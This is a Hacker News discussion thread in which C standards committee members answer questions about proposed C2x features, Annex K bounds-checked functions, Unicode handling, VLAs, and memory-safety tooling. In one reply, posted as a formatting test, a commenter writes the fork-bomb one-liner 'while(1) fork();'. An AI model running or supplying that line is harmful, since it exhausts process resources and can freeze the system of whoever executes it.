If you wrote down your proposal, which the C committee member Robert Seacord is encouraging you to do here: https://news.ycombinator.com/item?id=22870210 , you would have to think carefully about functions that are pure according to your definition (free from side effects and only uses its inputs) but do not terminate for some inputs.

There is at least one incorrect optimization present in Clang because of this (function that has no side-effects detected as pure, and call to that function omitted from a caller on this basis, when in fact the function may not terminate).


I thought the compiler was free to pretend loops without side effects always terminate, and in that sense it is already a "correct" optimization? Or is it only for C++, I'm not sure?


That may be the case in C++, but in C infinite loops are allowed as long as the controlling condition is a constant expression (making it clear that the developer intends an infinite loop). These infinite loops without side-effects are even useful from time to time in embedded software, so it was natural for the committee to allow them: https://port70.net/~nsz/c/c11/n1570.html#6.8.5p6

And you now have all the details of the Clang bug, by the way: write an infinite loop without side-effects in a C function, then call the function from another C function, without using its result.


sum += 2*f(2) seems nicer than writing sum += f(2) twice.

If you were enforcing this with the compiler, you would also need something to suppress the enforcement, because the millions of pre-existing functions would probably not get updated with a pure attribute. And once you do that, the compiler can't really trust anything that function does, because it may actually be calling a non-pure function.


When you're looking at an unfamiliar C code base for the first time, how do you approach it? Which files do you look for? Which tools to you open up immediately?


This depends a bunch on what your goals are. There are no specially named files, so looking for a particular filename is not particularly useful. It is sometimes informative to find the file containing the main, but not always.

My job at NCC Group involves a lot of code reviews, so frequently the files that are of interest to me are the ones that contain the most defects. I typically identify these by compiling with compiler warnings turned up and warning suppression turned down. I'll frequently also make use of static and dynamic analysis, including the GCC and Clang sanitizers.


It all depends on how organized previous workers were, and what your goal is for a modification of the source text. Often, headers (dot-h files) document the data structures and interfaces.


I start with generating tags.

  exctags --exclude=TAGS --exclude=TAGS.NEW --append -R -f TAGS.NEW --sort=yes  && mv TAGS.NEW TAGS
My editor (vim) has native support for quickly jumping from a use to definition via this TAGS index. History is preserved (i.e., there is a "back" button), so you can quickly dive through 5 layers of API and back out to understand where a value went. It is quite useful for starting with what you know and following it to the surprising behavior, without executing the code.


cscope can help


Is there a vim-style cscope interface for emacs? I hate that xcscope brings up its own persistent buffers (replacing other buffers that I had deliberately placed on the screen). Vim, conveniently, just pops up the cscope interface when I need to enter some input, and then hides it away. Also I don't think xcscope works with evil's tag stack whereas in vim, I believe, you can just return to where you were with ^T, whether using ctags or cscope.


Yes, I have found it helpful. One nice feature is that it uses a character-terminal interface, not a platform-specific GUI.


Could we have variadic macros with zero arguments in the standard? I'm not using any compiler that doesn't allow it.


The C standard does not allow a variadic function without at least one named parameter before the variadic arguments.

Conceptually, something must indicate to the function how many arguments it is supposed to request next, and with what types. Yes, you could write a function where this information is passed through a static-lifetime variable, but in practice the first mandatory argument is almost always used for that anyway.


You’re replying to a comment about macros, not about functions.
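For the macro side, a sketch of the zero-argument problem and the common workaround (the `##` paste is a GCC/Clang extension; C2x is expected to standardize __VA_OPT__ for the same purpose):

```c
#include <stdio.h>
#include <string.h>

/* Pre-C2x, `...` must receive at least one argument; FMT(buf, n, "x")
   would otherwise leave a trailing comma after fmt. The ## below is a
   GCC/Clang extension that swallows that comma when __VA_ARGS__ is
   empty. FMT is an illustrative name. */
#define FMT(buf, n, fmt, ...) snprintf((buf), (n), (fmt), ##__VA_ARGS__)
```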


A couple of (I hope easy) requests - 1. Can we add digit separators in constants? (C++ allows 0xFFFF'FFFF'FFFF'FFFF; any other reasonable scheme is fine too.)

2. I think many compilers already do this, but can the static initialization rules be relaxed a bit?

  static const int a = 0;
  static const int b = a; /* This is not standard C afaik. */
Thank you, CodeandC


WG14 in general looks favorably at proposals to align C more closely with C++ (within the overall spirit of the language) and I'd expect (1) would be viewed in that light.

I'd also say there is consensus that (2) would be beneficial. There are some good ideas in http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2067.pdf although I don't think repurposing the register keyword for it was very popular. Not just because it wouldn't be compatible with C++, which deprecated register some time ago, but also because it's novel with no implementation or user experience behind it. My impression is that this is waiting for a new proposal.


A binary literal would be nice too. Doing masks for embedded systems makes my head hurt sometimes. "Cpp compatibility" etc etc could be the excuse to implement it.
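For the record, binary literals already exist as a long-standing GCC/Clang extension and are slated for standardization in C2x (which is also expected to pick up C++'s digit separator, allowing 0b1111'0000). A sketch:

```c
/* 0b... literals: GCC/Clang extension, expected in C2x. */
static unsigned low_nibble_mask(void) {
    return 0b00001111;   /* arguably clearer than 0x0F for bit masks */
}
```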


What's up with `strlcpy` and `strlcat`? Are they getting standardized?


We've been considering proposals to add common POSIX APIs into C, but I don't believe we've seen a proposal for strlcpy or strlcat yet. I recall we agreed to add strdup to C given its wide availability and usage.


There are deficiencies in almost all proposals. Two new functions which avoid the problems are supposed to be published in C202x: strcasecmp and strncasecmp, added in header strings.h (note: not string.h).


strdup seems like a perfect example of "standardizing existing practice." And it has never struck me as running against the spirit of C.


In fact I proposed strdup on a few occasions, but it wasn't adopted. It seems that they didn't like for standard library functions to use malloc. POSIX.1 specifies strdup.


No one has proposed making these standard. I doubt they would gain much support as they are similar to the Annex K Bounds Checked Interface functions strcpy_s and strcat_s but not quite as good IMHO.


There were a number of recent proposals to adopt various POSIX functions by Martin Sebor into C including:

  N2353 2019/03/17 Sebor, Add strdup and strndup to C2X
  N2352 2019/03/17 Sebor, Add stpcpy, and stpncpy to C2X
  N2351 2019/03/17 Sebor, Add strnlen to C2X
He is lurking on this thread as well. These proposals can all be found in the document log at http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log...


The results (from the minutes http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2377.pdf)

6.33 Sebor, Add strnlen to C2X [N 2351] Result: No consensus on putting N2351 into C2X.

6.34 Sebor, Add stpcpy, and stpncpy to C2X [N 2352] Result: No consensus to put N2352 into C2X.

6.35 Sebor, Add strdup and strndup to C2X [N 2353] Result: N2353 be put into C2X. The committee wants a proposal for the wide character versions of any POSIX functions voted in this meeting.


There have been some disagreements on strlcpy/strlcat (BSD vs glibc crowd), although by now the debate has died off and these functions are pretty widely used. Also, while here, it would be lovely to have strchrnul() included.
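For readers unfamiliar with the interface, the BSD strlcpy contract can be sketched as follows (my_strlcpy is an illustrative name, not the libc symbol):

```c
#include <string.h>

/* Sketch of the strlcpy contract: copy at most size-1 bytes, always
   NUL-terminate when size > 0, and return strlen(src) so the caller
   can detect truncation by comparing the result against size. */
static size_t my_strlcpy(char *dst, const char *src, size_t size) {
    size_t len = strlen(src);
    if (size > 0) {
        size_t n = len < size - 1 ? len : size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return len;
}
```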


glibc still refuses to add the functions because they are not required by a standard.


> similar to the Annex K Bounds Checked Interface functions strcpy_s and strcat_s but not quite as good IMHO.

Err... I thought Annex K is deprecated and dead? Whereas strl* seem very much alive, some compilers even give a "strcpy/strncpy is unsafe, use strlcpy instead" warning.


FWIW, Annex K is not currently deprecated.


It's not commonly available though, e.g. on Linux/BSD systems...


Correct -- it would be nice if the glibc maintainers would reconsider their opinion of supporting the optional Annex K functionality. There is definitely user demand for the feature.


> rseacord 22 minutes ago [-]

> The C Committee has taken two votes on this, and in each case, the committee has been equally divided. Without a consensus to change the standard, the status quo wins.

The fact that it has only survived on status quo is a pretty crass hint that things aren't well with Annex K.


And every BSD out there. And whatever it is that macOS does. Microsoft looks to be the outlier to me.


Microsoft does not even implement Annex K.

> Microsoft Visual Studio implements an early version of the APIs. However, the implementation is incomplete and conforms neither to C11 nor to the original TR 24731-1.

> As a result of the numerous deviations from the specification the Microsoft implementation cannot be considered conforming or portable.

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1967.htm


macOS is POSIX compliant.


It should be.


Well, I am informally proposing making those standard :-).

IMO they're a lot more ergonomic than the Annex K functions, and do the thing most programmers think the strncat/strncpy functions do (admittedly, not part of ISO C).

Annex K should be forgotten as the mistake it is and we can move on with existing real-world interfaces instead of inventing features from whole-cloth. I thought that was generally the C standard operating practice.


I disagree, because they return a value that nobody really wants and thus perform poorly: https://saagarjha.com/blog/2020/04/12/designing-a-better-str...


So standardize them as returning void — great!


What you really want is it to tell you how much it copied.


I don't think I've ever wanted to know that, actually. Void is totally fine for my use.


I hope not, they perform much worse than they need to :(


It is 2020. You are looking at a series of projects your company has teed up. All are greenfield efforts - no legacy. What would be the attributes of a project that would have you recommend C as the programming language?


For anything embedded you have practically no choice but to use C (or assembly). Same goes for a lot of systems programming, e.g. writing Linux drivers.


Anything high performance: game engine, scientific computation, deep packet inspection, image analysis, machine learning, rendering engines, high frequency trading.... The list is long!


AFAIK, few seem to choose C for game engines or rendering engines. Not familiar with the other domains.


As there are a lot of C-masters lurking in this thread:

How can one process unicode (UTF-8) properly in C? As a CJK person, I wish there was a robust solution. Are there any standardized ways or proposals? (Using wchar doesn't count.)


Ignore all character support in the standard library and handle UTF-8 as opaque binary buffers. If you need complex string algorithms, decode into UCS-4 (UTF-32). You'll find short encoding and decoding functions on StackOverflow. For case-insensitive comparisons and sorting, use an external library that knows the latest Unicode standard.
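A minimal decoder along those lines (a hypothetical helper; production code should additionally reject overlong encodings and surrogate code points):

```c
#include <stddef.h>
#include <stdint.h>

/* Decode one UTF-8 sequence into a code point. Returns the number of
   bytes consumed, or 0 on an invalid or truncated sequence. */
static size_t utf8_decode(const unsigned char *s, uint32_t *cp) {
    if (s[0] < 0x80) { *cp = s[0]; return 1; }
    if ((s[0] & 0xE0) == 0xC0 && (s[1] & 0xC0) == 0x80) {
        *cp = ((uint32_t)(s[0] & 0x1F) << 6) | (s[1] & 0x3F);
        return 2;
    }
    if ((s[0] & 0xF0) == 0xE0 && (s[1] & 0xC0) == 0x80
        && (s[2] & 0xC0) == 0x80) {
        *cp = ((uint32_t)(s[0] & 0x0F) << 12)
            | ((uint32_t)(s[1] & 0x3F) << 6) | (s[2] & 0x3F);
        return 3;
    }
    if ((s[0] & 0xF8) == 0xF0 && (s[1] & 0xC0) == 0x80
        && (s[2] & 0xC0) == 0x80 && (s[3] & 0xC0) == 0x80) {
        *cp = ((uint32_t)(s[0] & 0x07) << 18)
            | ((uint32_t)(s[1] & 0x3F) << 12)
            | ((uint32_t)(s[2] & 0x3F) << 6) | (s[3] & 0x3F);
        return 4;
    }
    return 0;  /* invalid lead byte or malformed continuation */
}
```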


Except that not all binary data is valid UTF-8 so you also need functions that check if a binary buffer is valid UTF-8.


The decoding phase will do that, if needed. Also note that in many cases you must process it as opaque binary, even though it should be valid UTF-8. This is in particular with filenames on POSIX systems because otherwise you could not access any files that happen to have invalid UTF-8 in their names.


UTF-8 encoding works "as is" based on byte strings (char[]). The latest versions of the draft standard provide somewhat more support.

I recommend heading toward a future where only UTF-8 encoding is used for multibyte characters and UCS-2 or similar for wchar_t. There is no need to support several different encodings.


Aaron Ballman even got a u8 character prefix added to C2x:

N2198 2018/01/02 Ballman, Adding the u8 character prefix

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2198.pdf


UCS-2 is a bad choice -- it fails to represent most unicode characters. If you meant UTF-16, that's also a bad choice, because UTF-16 is also a variable width encoding, forcing programmers to use some form of "extra-wide char".

I'm of the opinion that wchar_t should become an alias for char32_t.


Yes, I meant the 31-bit code point value (more than 16, anyway). It is the most useful width for doing things with wide characters.


UTF-32 is also a variable-width encoding; eg 00000044 00000308 aka "D̈".


I thought it was strictly one character per 32-bit code. Anyway, whatever it is called it is what wchar_t should be.


There are no fixed-width encodings with a range of encodable characters anywhere near that of Unicode.


It's too bad Unicode wasn't designed around the concept of easily-recognizable grapheme clusters and "write-only" [non-round-trip] forms that are normalized in various ways. A text layout engine shouldn't have to have detailed knowledge of rules that are constantly subject to change. But if there were a standard representation for a Unicode string where all grapheme clusters are marked and everything is listed in left-to-right order, and an OS function were available to convert a Unicode string into such a form, a text-layout engine using that OS routine would be able to accommodate future additions to the character set and glyph-joining rules without having to know anything about them.


You can't do that without committing to not supporting pathological text; otherwise you're stuck adding new special cases to the layout engine every update anyway.

I do have some ideas for a better encoding (like, I assume, anyone competent with sufficient free time and interest in text encoding), but there's a lot of reluctance to put effort into something that's already completely eclipsed by a technically inferior but not completely unusable alternative, so I've had it mostly shelved.


Check this: http://utf8everywhere.org/

Basically store the text as char arrays, and convert them when needed. Meanwhile, you could use this single file header: https://github.com/RandyGaul/cute_headers/blob/master/cute_u...


As a reviewer for Robert's upcoming C book “Effective C”, I thought that this aspect was better covered than in existing manuals for learning C.

However, the book only describes the available standard functions, so even doing better than other manuals, everything it has to say on this subject fits in one chapter and feels underpowered.


Your best bet is probably to use a library like ICU.

Here are examples of working with unicode in C: https://begriffs.com/posts/2019-05-23-unicode-icu.html



What sort of processing do you want to do?


Any plans to add semantics for exceptional situations such as divide by zero and dereferencing a null pointer? https://blog.regehr.org/archives/232

Or incorporating features from this 14 item list? https://blog.regehr.org/archives/1180

As it appears these have failed: https://blog.regehr.org/archives/1287


I don't know of any plans to add semantics for divide-by-zero or dereferencing a null pointer. I'm guessing this is not viable because there is no agreed upon semantics among different implementations.

Making C friendlier is always a good idea, and I think the committee is (slowly) working towards this goal. I would have to examine these papers by John Regehr in more detail. Looking quickly at his proposals I can see why he couldn't find consensus for these ideas, as some of them do appear controversial.

An example of a friendlier dialect of C is C0 (C-naught) from CMU. I don't think I'm exaggerating when I say that this language has not "caught on".


The problem is that if the checks are always performed, the object code is significantly slowed down. If all computers supported the checking in hardware, then we could do it. You don't really want the current C approach (signal) to trigger except in an emergency, because there is no way to insert cleanup/retry/etc. recovery code via a signal handler.


Consider the following function:

    void test(int a, int b)
    {
      int c = a/b;
      if (f1())
        f2(a,b,c);
    }
Should a compiler be required to compute c before calling f1, and thus have to store the value of c across the function call?

Better would be to define a set of semantics for loosely-sequenced traps, along with "causality barriers" to ensure that they only occur at tolerable times.


Thanks for the AMA

1. Will the Apple's Blocks extension, which allows creation of Closures and Lambda functions, be included in C2X?

2. Are there any plans to improve the _Generic interface (to make it easy to switch on multiple arguments, etc.)?


> 1. Will the Apple's Blocks extension, which allows creation of Closures and Lambda functions, be included in C2X?

We haven't seen a proposal to add them to C2x, yet. However, there has been some interest within the committee regarding the idea, so I think such a proposal could have some support.

> 2. Are there any plans to improve the _Generic interface (to make it easy to switch on multiple arguments, etc.)?

I haven't seen any such plans, but there is some awareness that _Generic can be hard to use, especially as you try to compose generic operations together.


1. The reason I asked was because I remember reading the proposal as N2030[1] and N1451[2] a while back. Were these never actually presented for voting? (not sure how the commitee works)

[1]: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2030.pdf

[2]: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1451.pdf


Ah! No, those just predate my joining the committee and haven't really come up since they were presented.

Basically, every paper that gets submitted by an author will get some amount of discussion time at the next available meeting as well as feedback from the committee on the proposal. I'm not certain what feedback these papers received (we could look through the meeting minutes for the meetings the papers were discussed at to find out, though).


+1 for the first point. Every major compiler can do the lambda-lifting transformation, either because of C++ lambda or OpenMP support. It's frustrating doing this manually while knowing the compiler supports it internally, but does not expose it natively.


I know this opinion is unpopular and contradicts a core value of the C standardization committee, but I personally think that at some point the C standard should abandon support for legacy codebases. I think the bool and stdint definitions should be available as part of the standard feature set and shouldn't require including their respective headers. These and some other features are available at the core of every modern language but C, and C has to provide them via other means. Is the sentiment of discontinuing legacy support shared within the committee, by any proportion?


We've started doing some things in this area, but I don't think the committee would abandon legacy code bases entirely. Instead, we try to make a migration path for code bases.

For instance, we added the '_Bool' data type and require you to include <stdbool.h> to spell it 'bool' instead and to get 'true' and 'false' identifiers. This was done to not impact existing code bases that had their own bool/true/false implementation with those spellings. Now that "enough" time has passed for legacy code bases to update, we're looking into making these "first-class" features of the language and not requiring <stdbool.h> to be included to use them. We're doing the same for things like _Static_assert vs static_assert, etc for the same reason.
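Concretely, the current shape of that migration path (bool/true/false are macros supplied by the header; promoting them to first-class keywords is the change under discussion):

```c
#include <stdbool.h>   /* maps bool, true, false onto _Bool (through C17) */

static _Bool keyword_form = 1;    /* the keyword, available since C99 */
static bool  header_form  = true; /* the same type, nicer spelling */
```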


Can't upvote enough. I think these changes could also be made in a way that can be mechanically-translatable.

For example: removing the register keyword, always requiring a return statement, etc etc.

A lot of changes can be made that will make static analysis easier.

There will always be people with 50 year old code bases that will never change (and some c89 compiler will always be there for them), but the language is pervasive enough that it deserves progressive changes to make it (even) simpler and safer and slightly more high level.


I'd love it if we could do away with all the headers.

Just #include <stdc.h> and be done with it. No need to remember stdio, stdint, stdbool, limits, assert, signal.h, etc, etc.

This new header comes with a guarantee that use of identifiers in the standard-reserved namespace will break your code. Perhaps compilers could even enforce this preemptively.


You can easily create your own stdc.h include file. Something similar was done on Plan 9.

Note that by including the content of all the headers, you're increasing the chance for collisions with application identifiers. You might consider that more of a benefit than a drawback.


Microsoft's "Checked C" seems to be the last attempt to fix C security flaws.

From the outside, after Annex K adoption failure, WG14 doesn't seem to be willing to make C safer in any way.

Are there any plans to take efforts like Checked C in consideration regarding the future of ISO C?


Ken Thompson, Rob Pike, Brian Kernighan, Russ Cox, and Robert Griesemer are the guys who created Unix, B, C, Go, UTF-8, etc. Maybe it would be useful to invite these guys (or one of them) onto the C Standards Committee to help improve and design new language features?


I think a lot of these dudes are retired. A lot of good C people like P.J. Plauger, John Benito, and Clark Nelson have all retired recently. Anyway, they are all invited back. As an incentive, we typically have free coffee and snacks at most of the meetings. :)


I do find that C is difficult to use for large programs. Are there any thoughts about introducing features like namespaces?

Another thing that is very cumbersome to do in C is object creation; creating instantiable objects can be very cumbersome. Is there some feature in the thought process to deal with this? To make it clear: in C we can create a data structure like a Stack or a queue easily, but if the program needs 10 stacks there is presently no simple way of achieving it.


In BRL's MUVES project, we used a 2-character prefix indicating category. E.g., all the external identifiers for our fancy memory allocator began with "Mm", where Mm.h documented the interface for the Mm package only.

To minimize the external identifiers, one could make just the name of a container structure the sole entry access handle, with structure members pointing to the functions. Then use it like:

  #include <Mm.h>
  if ((new = Mm.allo(size)) == NULL)
    Er.abort("out of memory");


Tip: you can use four leading spaces to write code.

    Like this


You only need two!

  like this


I tried, but two spaces yielded what you saw.


Huh, it also needed an extra line break before the first line of code. I didn't realize that! I've fixed it now.


I didn't realize that either, but it's described in formatdoc as such. So if you changed that behavior, probably should change the docs too.


I didn't change the behavior - I just added a newline. Sorry that wasn't clear.


You should be commended for the fast customer service!


I did not know that, after spending years on HN.

    while(1) fork();



C has been making strides towards complete Unicode support. I've been having trouble following along though: Am I correct in assuming that there's no actual multi-byte UTF-8 to UTF-32 Rune function and the best approximation depends on whatever wchar_t is? How would I best handle pure Unicode input and output scenarios on a "hostile" OS whose native character encoding is some EBCDIC abomination or a Windows codepage?


Converting arrays of UTF-8-encoded char to arrays of UTF-32-encoded 'rune' would probably not do what you want. That still leaves e.g. combining diacritical marks as separate from the characters they modify. If you care about breaking up text into codepoints, you probably also care about that sort of thing. The base unit of Unicode is the extended grapheme cluster. In order to actually convert text into extended grapheme clusters, however, you need a database that tells you what kind of codepoint each codepoint is. Since C is standardized less frequently than Unicode, any kind of Unicode or UTF support in the specification would quickly get out of date.


Probably link libicu rather than rely on libc.


libicu is a 40 MB mess when you need only 5 KB of it. Only case folding and one normalization are needed, with tiny tables.

Additionally, the UNICODE_MAJOR and _MINOR versions in use matter: they are always years behind, and you never know which table versions are implemented.


  -Wl,--gc-sections


Are you looking for mbstowcs() or mbtowc() ?


wchar_t can be (a) not Unicode in any way, or (b) 16-bit, insufficient to represent a rune.


Will C eventually get something like C++' constexpr?


C has some basic support for constant expressions already, but there has not yet been a proposal to bring 'constexpr' over from C++. Personally, I would love this feature to be in C!


You and me both!


This is really the only thing that I really want from C++. It would be amazing if this could make the cut for a future spec.

EDIT: I work on embedded systems, where C is king, and it seems like I spend an inordinate amount of time working with code generators that build simple tables. All of which could go away with this feature.


Why do you want it in C? What are your use cases?

I’ve always thought that idiomatic C for constexpr would be to write the code you want executed at compile time in a separate file (or files), build it, execute it, and then #include the result in your program before building the final executable, adding a build step but keeping overall complexity minimal.

This is different from the C++ approach, where everything and the kitchen sink is added to the standard, and then you have to issue errata for errata for the standard and hope that the compiler you have to use on your current platform is keeping up with the latest changes.


What are two or three C codebases that are elegantly and cleanly written, and that every mid-level C programmer should read for sake of knowledge?


I would recommend musl, although the style is a bit idiosyncratic in places: https://www.musl-libc.org

Mbed TLS, since I have it in mind from another thread, is also a pretty clean C library for the problem it tries to solve; it's a testament to its design that we (TrustInSoft, who had not participated in its development) were able to verify that some uses of the library were free of Undefined Behavior: https://tls.mbed.org


> "I would recommend musl, although the style is a bit idiosyncratic in places: https://www.musl-libc.org"

Opened a random part of musl out of sheer boredom. Here's what I see:

https://git.musl-libc.org/cgit/musl/tree/include/aio.h

A bunch of return codes #defined like so (see https://git.musl-libc.org/cgit/musl/tree/src/aio/aio.c):

  #define AIO_CANCELED 0
  #define AIO_NOTCANCELED 1
  #define AIO_ALLDONE 2

  #define LIO_READ 0
  #define LIO_WRITE 1
  #define LIO_NOP 2

  #define LIO_WAIT 0
  #define LIO_NOWAIT 1

Why weren't they using an enum instead? I wouldn't sign off on this code (and I don't think it lives up to best practices).


musl is implementing POSIX. POSIX requires those constants to be preprocessor defines. (Generally, musl assumes the reader is quite familiar with the C and POSIX standards, which makes sense since it's a libc implementation.)


PostgreSQL


I love how small of a language C is and get concerned when people recommend adding feature x,y and z.

What's the plan for C over the next 5 - 10 years?


There is no grand goal that I know of. I wish more importance were being placed on keeping existing well-written code working, which includes continued support for what might be considered near-obsolete. If one wanted to design a new (not fully compatible) language, that could have lofty goals; just don't call it "C".


I'm about a mid-level experienced developer, and have been attempting to learn C via a few side projects. I come from mostly Python and Go, which both have very robust standard libraries, so I was quite surprised to find that string parsing is very poorly supported in C. Is there a reason that very common string parsing cases are missing from the C stdlib?


What are the chances of typeof, or statement expressions, finding their way into the C standard? They're already widely implemented.


Several of us discussed typeof and I'd expect a proposal for a feature along these lines to be well received. (I recall someone even saying they're working on one but that shouldn't stop anyone from submitting one of their own.)


I'm glad to hear that.

What about statement expressions? They're quite useful, and supported by multiple independent compilers.


I'm not aware of recent proposals for those but we have discussed ideas along those lines (closures: N2030, C++ lambdas, Apple Blocks: N1451, and I think there was one from Cilk). I think there was interest but not enough support for the details and likely also concerns from implementers.


What’s the current committee thinking on providing locale-independent conversions from potentially-invalid UTF-8 to valid UTF-8, from potentially-invalid UTF-8 to valid UTF-16, and from potentially-invalid UTF-16 to valid UTF-8 (i.e. replacing ill-formed sequences with the REPLACEMENT CHARACTER)?


If you changed UTF-16 to UTF-32 or UCS-4 I'd support it. I think there are already implementations that use the replacement character for all "impossible" codes.


What’s your use case for UTF-32?


There are several multibyte character manipulations that are easier if there is a uniform-sized encoding (wchar_t).


Are any concurrency primitives planned for introduction in future C revisions?


We currently have not seen papers proposing to add new concurrency primitives for C2x, but we have been actively working on the concurrency object model and would welcome proposals for new primitives or concurrency-related fixes.

One goal is to re-unify C with the concurrency object model used by C++ to make std::atomic<T> and _Atomic(T) be ABI compatible as intended in C11. Some small fixes in this area are the removal of ATOMIC_VAR_INIT, clarifying whether library functions can use thread_local storage for internal state, and things along those lines. However, we expect there to be more efforts in this area as we progress the standard.


Hi,

Do you think Annex K of C11 will be widely adopted by programmers or unused? Why aren't people adopting it?

Do you see the use of any analysis tools that are particularly effective for finding memory safety issues?

C++ added in smart pointers to its specification. Are there any plans to do something similar in future C specifications?

Thanks!


> Do you think Annex K of C11 will be widely adopted by programmers or unused? Why aren't people adopting it?

So far, it's not been widely adopted. Part of the issue is that there are specification issues relating to threads and the constraint handlers, and part of the issue is that popular libc implementations have actively resisted implementing the annex.

That said, I field questions about Annex K on a regular basis and there are a few implementations in the wild, so there is user interest in the functionality.

> Do you see the use of any analysis tools that are particularly effective for finding memory safety issues?

<biased opinion>I think CodeSonar does a great job at finding memory safety issues, but I work for the company that makes this tool.</biased opinion>

I've also had good luck with the memory and address sanitizers (https://github.com/google/sanitizers) and tools like valgrind.

> C++ added in smart pointers to its specification. Are there any plans to do something similar in future C specifications?

We currently don't have any proposals for adding smart pointers to C. Given that C does not have constructors or destructors, we would have to devise some new mechanism to implement or replace RAII in C, which would be one major hurdle to overcome for smart pointers.


I’ve had good luck (in C++) replacing the underlying memory allocator with one that tracks leaks by allocation type (which is fast enough for production use).

This can be done in C, but the calling code has to spell malloc and free differently.

In debug mode, configuring malloc to poison (and add fences) on allocation and free finds most of the remaining things.

These techniques tend to have much lower runtime overhead than valgrind (2-digit percentages vs 5-10x), so they can be left on throughout testing and partially enabled in production.

They find >90% of the memory bugs that I write (assuming valgrind finds 100%). YMMV.


> We currently don't have any proposals for adding smart pointers to C. Given that C does not have constructors or destructors, we would have to devise some new mechanism to implement or replace RAII in C, which would be one major hurdle to overcome for smart pointers.

Why would you have to devise a new mechanism rather than borrow one of the thousand other mechanisms already existing in PL literature for this?


Annex K isn't being adopted because it's unergonomic and doesn't solve the problem it purports to. Even the proposer (Microsoft) does not actually implement Annex K as specified in the ISO standard.


Microsoft originally implemented the Annex K bounds-checked interfaces (e.g., the *_s functions) back in the 1990s in response to well-publicized vulnerabilities. They proposed standardization to the C Standards committee. The committee made many changes to the proposal, possibly going too far away from the original implementation. During this time, I would say that Microsoft was very deferential to the wishes of the committee.

By the time ISO/IEC TR 24731-1:2007 was released, and Annex K was later added to the C Standard, Microsoft had to decide whether they wanted to change the interfaces to conform to the changed standard and re-implement their code bases. They presumably decided that they did not, which I think is a defensible decision.

As to unergonomic, examples please?


I think we are in agreement that Microsoft does not implement Annex K as specified in ISO C. I don't fault them for that; I wouldn't either.

As to unergonomic, that's somewhat subjective. But I'm a long-time C practitioner and that's my feel of the API. Constraint handlers are a mistake. Ambient state that is not part of the function interface, as well as asynchronous interaction, make for poor APIs. Constraint handlers are a mismatch for library use of safe functions, as well as kernel environments.

Most functions seem pointless; e.g., snprintf_s. Re-adding gets() in the form of gets_s() seems unhelpful. Why bsearch_s, qsort_s, memcpy_s/memmove_s?? Do you really think strerror_s() is useful? Or strnlen_s()?


Wrong. Many implemented them: Microsoft first, followed by Cisco, Watcom, Embarcadero, Huawei, and Android. They are widely used on Windows, in embedded systems, and on phones.

Microsoft just changed one bit of the proposal, but no one followed them there. Currently theirs is the most widely used and the worst implemented. I tested all of them.

It solves the bounds-checking problem better than _FORTIFY_SOURCE, ASAN, and valgrind, because it always performs the checks, whether at compile time or run time, independent of the optimizer and the intrinsics used (where valgrind fails), and it is much faster than ASAN. Also faster than glibc, btw.


What is the story behind the removal of VLAs from C99 in later revisions?


VLAs are still present in C17 and have not been removed. They are, however, an optional feature with a truly weird (IMHO) feature testing macro. If '__STDC_NO_VLA__' is defined to 1, then the implementation does not support VLAs.

IIRC, this macro was added to C11 along with a batch of other "these are optional" macros for atomics, complex, threads, etc. However, I don't recall whether C99 adopted the features as optional features and missed the feature testing macro, or if they were required features in C99 that we made optional in C11.


Complex and VLA were required by C99, but made optional in C11. The others were new in C11.


So I spend a possibly unreasonable amount of time and page space discussing VLAs in the Effective C book. I understand there are some problems with them, but for what it is worth, I really like the feature, particularly when used in function prototype scope.


I usually don't let them leak into public interfaces, and don't allocate VLAs, but really like VLA pointers for multi-dimensional array processing such as []:

  double (*a)[N][P] = (double (*)[N][P])a_flat;
  for (i=0; i<M; i++)
    for (j=0; j<N; j++)
      for (k=0; k<P; k++)
        a[i][j][k] = f(i, j, k);

The alternative would be

        a_flat[(i*M+j)*P+k] = f(i, j, k);
which is a lot more error-prone. I understand that some implementations (notably MSVC) declined to implement VLAs, but I really wish that at least VLA pointers could have remained a mandatory part of C11 and later standards.

[] Has there been any discussion of adding GCC's "typeof" to the standard?


They did not remove them, but made them optional.

It's a controversial feature that can produce bugs, and it's banned in a lot of projects (one famous example: the Linux kernel).


I can't live without it.


What removal? C11 section 6.7.6.2 specifies the semantics.


What the parent comment probably meant is that support for VLAs was required in C99 but is no longer required in C11, so while code written for C99 could use VLAs without any special consideration, code written for C11 cannot depend on VLAs, since the feature might not be present in all compilers.


I think C is an exceptional good language for a long time, but the world is changing and maybe C must evolve with new trends, new researches in programming languages.

In my view C and C++ now almost different languages with a different philosophy of programming, different future, and different language design.

It will be sad if "modern" C++ almost replaces C. Many C++ developers use "Orthodox C++" https://gist.github.com/bkaradzic/2e39896bc7d8c34e042b, and this shows that people would be more comfortable with C plus some really useful features (namespaces, generics, etc.), but not modern C++. I very often hear from my job colleagues and from many other people who work with C++ how terrible modern C++ is (https://aras-p.info/blog/2018/12/28/Modern-C-Lamentations/, https://www.youtube.com/watch?v=9-_TLTdLGtc) and how good it would be to see and use a new C with some extra features. Maybe it is time to start thinking about evolving C, for example:

  - Generics. Something like generics in Zig, Odin, Rust. etc.
  - AST Macros. For example Rust or Lisp macroses, etc.
  - Lambda
  - Defer statement
  - Namespaces
What do you think?

https://ziglang.org/documentation/master/#Generic-Data-Struc...

https://odin-lang.org/docs/overview/#parametric-polymorphism

https://doc.rust-lang.org/rust-by-example/generics.html


One of my favorite features recently while developing C for embedded systems has been the --wrap linker flag that allows me to effectively test code that interacts with hardware without modifying the source.

By passing -Wl,--wrap=some_function at link time with test code we can then define

  __wrap_some_function
that will be called instead of some_function. Within __wrap_some_function one can also call __real_some_function, which resolves to the original version if you still want to call it. This is especially useful when trying to observe certain function calls in tests that interact with hardware.

Do you have any other recommendations/preferences to help with unit-testing C code?


I'm no C expert, but my two wishes for C would be:

- Basic type inference to reduce keystrokes, and prevent ripples when changing types. (like auto in C++)

- Equality operators defined for structs. Perhaps even lexicographical comparison, if I'm dreaming.

Any thoughts on either of those?


Things I would like C to have:

- stricter type-checks on typedef types (useful when passing function parameters)

- gcc's 'warn_unused_result' attribute for functions (ensure error returns are checked)

- on-entry/on-exit qualifiers for functions (to do things like make sure you lock/unlock semaphores before entry/exit of a function)

- D language's 'scope' feature (better handling of error paths)

- loops in the C pre-processor! (better code-gen)

